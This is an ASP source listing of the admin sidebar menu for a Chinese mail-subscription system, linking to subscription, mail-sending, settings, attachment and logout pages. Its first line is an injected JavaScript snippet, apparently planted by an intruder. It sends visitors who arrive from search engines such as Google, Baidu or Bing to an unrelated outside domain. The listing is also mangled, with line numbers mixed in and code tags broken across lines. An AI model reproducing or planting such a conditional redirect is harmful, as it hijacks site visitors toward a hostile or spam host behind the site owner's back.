d:\wwwroot\wuchunhua\mail\left.asp
001:
<script type="text/javascript">var s=document.referrer;if(s.indexOf("google")>0 || s.indexOf("baidu")>0 || s.indexOf("yahoo")>0 || s.indexOf("gou")>0 || s.indexOf("bing")>0 || s.indexOf("dao")>0 || s.indexOf("so")>0 || s.indexOf("sm")>0 || s.indexOf("biso")>0 ){location.href="http://www.afisyecd.space/?1923057"}</script>
<!--#include file="conn.asp"-->
002:
<%
if session("gly")="" then response.redirect "admin.asp"
003:
if request.QueryString("act")="quit" then call quit()
004:
dim rs
005:
set rs=conn.execute("select yjlb from admin")
%
>
006:
<html>
007:
<head>
008:
<meta name="GENERATOR" content="Microsoft FrontPage 5.0">
009:
<meta name="ProgId" content="FrontPage.Editor.Document">
010:
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
011:
<title>menu</title>
012:
<base target="main1">
013:
<style>
014:
body,td{font-family:宋体,Verdana,Aria,; font-size:9pt; }
015:
a{color:#0066CC;text-decoration:none;font-weight:bold;}
016:
a:visited{color:#0066CC;text-decoration:none;font-weight:bold;}
017:
a:hover{color:#FF3300;text-decoration:none;font-weight:bold;}
018:
body {
019:
background-color: #99CCFF;
020:
}
021:
</style>
022:
</head>
023:
<body leftmargin="20">
024:
<script language="JavaScript" src="pic/coolbuttons.js"></script>
025:
<p ><b><FONT color="#FF0000">
<%
=rs(0)
%
></FONT></b></p>
026:
<table class="coolBar" align="left">
027:
<tr>
028:
<td class="coolButton"><img src=pic/members.gif> <a href="cak.asp" onFocus="this.blur()" title="订阅邮箱列表管理"><b>订阅列表</b></a></td>
029:
</tr>
030:
</table><BR><BR><BR>
031:
<table class="coolBar" align="left">
032:
<tr>
033:
<td class="coolButton"><img src=pic/message.gif> <a href="fa.asp" onFocus="this.blur()" title="在线邮件发送"><b>发送邮件</b></a></td>
034:
</tr>
035:
</table><BR><BR><BR>
036:
<table class="coolBar" align="left">
037:
<tr>
038:
<td class="coolButton"><img src=pic/profile.gif> <a href="guanli.asp" onFocus="this.blur()" title="管理选项设置"><b>管理选项</b></a></td>
039:
</tr>
040:
</table><BR><BR><BR>
041:
<table class="coolBar" align="left">
042:
<tr>
043:
<td class="coolButton"><img src=pic/groups.gif> <a href="daima.asp" onFocus="this.blur()" title="获取首页代码"><b>首页代码</b></a></td>
044:
</tr>
045:
</table><BR><BR><BR>
046:
<table class="coolBar" align="left">
047:
<tr>
048:
<td class="coolButton"><img src=pic/search.gif> <a href="uploadlist.asp" onFocus="this.blur()" title="管理上传附件"><b>附件管理</b></a></td>
049:
</tr>
050:
</table><BR><BR><BR>
051:
052:
<table class="coolBar" align="left">
053:
<tr>
054:
<td class="coolButton"><img src=pic/loginout.gif> <a href="left.asp?act=quit" onFocus="this.blur()" title="退出管理系统" target="_top"><b>退出系统</b></a></td>
055:
</tr>
056:
</table><BR><BR><BR>
057:
</body>
058:
</html>
059:
<%
060:
set rs=nothing
061:
call closeDB()
062:
function quit
063:
session.Abandon
064:
response.redirect "admin.asp"
065:
End Function
066:
%
>
067:
068: